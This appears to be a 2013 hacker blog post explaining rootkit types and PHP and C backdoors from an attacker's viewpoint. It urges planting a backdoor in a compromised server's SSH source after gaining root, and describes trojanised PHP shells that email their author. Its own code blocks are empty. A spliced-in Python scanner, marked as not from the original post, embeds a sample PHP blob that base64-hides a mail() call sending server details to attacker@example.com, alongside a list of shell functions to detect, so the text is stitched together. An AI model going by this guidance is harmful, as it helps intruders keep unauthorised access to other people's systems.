Tuesday, 15 January 2013

Rootkits and backdoors 101

I. What is a rootkit?

A rootkit is software that enables continued privileged access to a computer while actively hiding its presence from administrators by subverting standard operating system functionality or other applications (backdoor). - Wikipedia

1. What are rootkits useful for?
After getting access to a system and escalating your privileges to root, it would be nice to have a backdoor on that server, right? Imagine you spend a lot of hours trying to get in and twice that amount of time to get root; the next day the administrators find out and patch everything, and then you are basically fucked. To prevent this from happening, rootkits are extremely useful, but they are also easily detected by rootkit hunters (anti-rootkit software).

2. Types of rootkits
There are at least five types of rootkit, ranging from those at the lowest level in firmware (with the highest privileges), through to the least privileged user-based variants that operate in Ring 3. Hybrid combinations of these may occur spanning, for example, user mode and kernel mode.

[Image: protection rings diagram, Ring 0 through Ring 3; note that Ring -1 is not shown]

2.1 User-mode
User-mode rootkits run in Ring 3, along with other applications as a user, rather than as low-level system processes. They have a number of possible installation vectors to intercept and modify the standard behavior of application programming interfaces (APIs). Some inject a dynamically-linked library (such as a .DLL file on Windows, or a .dylib file on Mac OS X) into other processes, and are thereby able to execute inside any target process to spoof it; others with sufficient privileges simply overwrite the memory of a target application.

2.2 Kernel mode
Kernel-mode rootkits run with the highest operating system privileges (Ring 0) by adding code or replacing portions of the core operating system, including both the kernel and associated device drivers. Most operating systems support kernel-mode device drivers, which execute with the same privileges as the operating system itself. As such, many kernel-mode rootkits are developed as device drivers or loadable modules, such as loadable kernel modules in Linux or device drivers in Microsoft Windows. This class of rootkit has unrestricted security access, but is more difficult to write.

2.3 Bootkits
A kernel-mode rootkit variant called a bootkit is used predominantly to attack full disk encryption systems, for example as in the "Evil Maid Attack", in which a bootkit replaces the legitimate boot loader with one controlled by an attacker; typically the malware loader persists through the transition to protected mode when the kernel has loaded. For example, the "Stoned Bootkit" subverts the system by using a compromised boot loader to intercept encryption keys and passwords.[38] More recently, the Alureon rootkit has successfully subverted the requirement for 64-bit kernel-mode driver signing in Windows 7 by modifying the master boot record.

2.4 Hypervisor level
Rootkits have been created as Type II Hypervisors in academia as proofs of concept. By exploiting hardware virtualization features such as Intel VT or AMD-V, this type of rootkit runs in Ring -1 and hosts the target operating system as a virtual machine, thereby enabling the rootkit to intercept hardware calls made by the original operating system. Unlike normal hypervisors, they do not have to load before the operating system, but can load into an operating system before promoting it into a virtual machine. A hypervisor rootkit does not have to make any modifications to the kernel of the target to subvert it; however, that does not mean that it cannot be detected by the guest operating system. For example, timing differences may be detectable in CPU instructions.

2.5 Hardware/Firmware
A firmware rootkit uses device or platform firmware to create a persistent malware image in hardware, such as a network card, hard drive, or the system BIOS. The rootkit hides in firmware because firmware is not usually inspected for code integrity. John Heasman demonstrated the viability of firmware rootkits in both ACPI firmware routines[44] and in a PCI expansion card ROM.

2.6 PHP backdoor
There are a lot of PHP backdoors, mainly planted into the "PHP shells" used by hackers like us (c99, r57 etc.). Let's examine the following "legitimate PHP shell":

If you aren't skilled in PHP, you can still do a quick skim of the PHP file; it doesn't take a genius, really. You scroll down and scroll and scroll... and at line 399 you find something: a base64 encoded string. A quick Google query for "online base64 decoder" gives us somewhere to decode that string (http://www.opinionatedgeek.com/dotne.../base64decode/). So we input:


The decoded output is:


What do we have here? "feelcomz@gmail.com" receives an email once someone enters his shell: he gets the IP and location of the shell. Now isn't that a comfortable backdoor? Instead of hacking websites yourself, you backdoor a shell, try to popularize it in some way, and you have a good "income" of shells.
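As an added defensive check (not code from the original post), here is a small Python scanner that automates the manual review the post describes: it finds long base64 runs in a PHP file, decodes them, and flags any blob whose decoded text contains calls such as mail() or eval(). The sample PHP file and the attacker@example.com address are constructed for the demo and are not the c99/r57 code.

```python
import base64
import re

# Constructed sample PHP "shell" (not c99/r57): file-manager code with a
# base64 blob hidden deep in the source, the pattern the post describes.
HIDDEN_PHP = ('mail("attacker@example.com", "new shell", '
              '$_SERVER["REMOTE_ADDR"] . " " . $_SERVER["HTTP_HOST"]);')
SAMPLE_PHP = (
    "<?php\n"
    "// ... hundreds of lines of legitimate-looking file manager code ...\n"
    "$o = '" + base64.b64encode(HIDDEN_PHP.encode()).decode() + "';\n"
    "eval(base64_decode($o));\n"
    "echo 'ready';\n"
)

# A base64 run long enough to hide a statement; short tokens are ignored.
B64_RE = re.compile(r"[A-Za-z0-9+/]{40,}={0,2}")
# Calls whose presence inside a decoded blob deserves a human look.
SUSPICIOUS = ("mail(", "eval(", "system(", "exec(", "shell_exec(",
              "passthru(", "fsockopen(", "curl_exec(")


def find_hidden_calls(php_source):
    """Return [(line_no, decoded_text, [matched calls])] for every base64
    blob in php_source that decodes to text containing a suspicious call."""
    findings = []
    for line_no, line in enumerate(php_source.splitlines(), start=1):
        for match in B64_RE.finditer(line):
            try:
                decoded = base64.b64decode(match.group(0), validate=True).decode("utf-8")
            except (ValueError, UnicodeDecodeError):
                continue  # bad padding or a binary payload: not text, skip
            if not decoded.replace("\n", "").replace("\t", "").isprintable():
                continue  # decoded bytes are not readable source
            hits = [call for call in SUSPICIOUS if call in decoded]
            if hits:
                findings.append((line_no, decoded, hits))
    return findings


if __name__ == "__main__":
    for line_no, decoded, hits in find_hidden_calls(SAMPLE_PHP):
        print(f"line {line_no}: hidden {hits} -> {decoded}")
```

Run it over a downloaded shell before deploying it anywhere; anything it flags is a line to decode and read by hand, exactly as the post does at line 399.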

2.7 Specific case for C programs
For C programs (the same example as the backdoor that was planted in ProFTPD 1.3.3c, which I recommend you analyze):


It is useful, after you have hacked a server and gained root access, to put this into their SSH source and have a nice backdoor.

II. Reference / Thanks to
Wikipedia
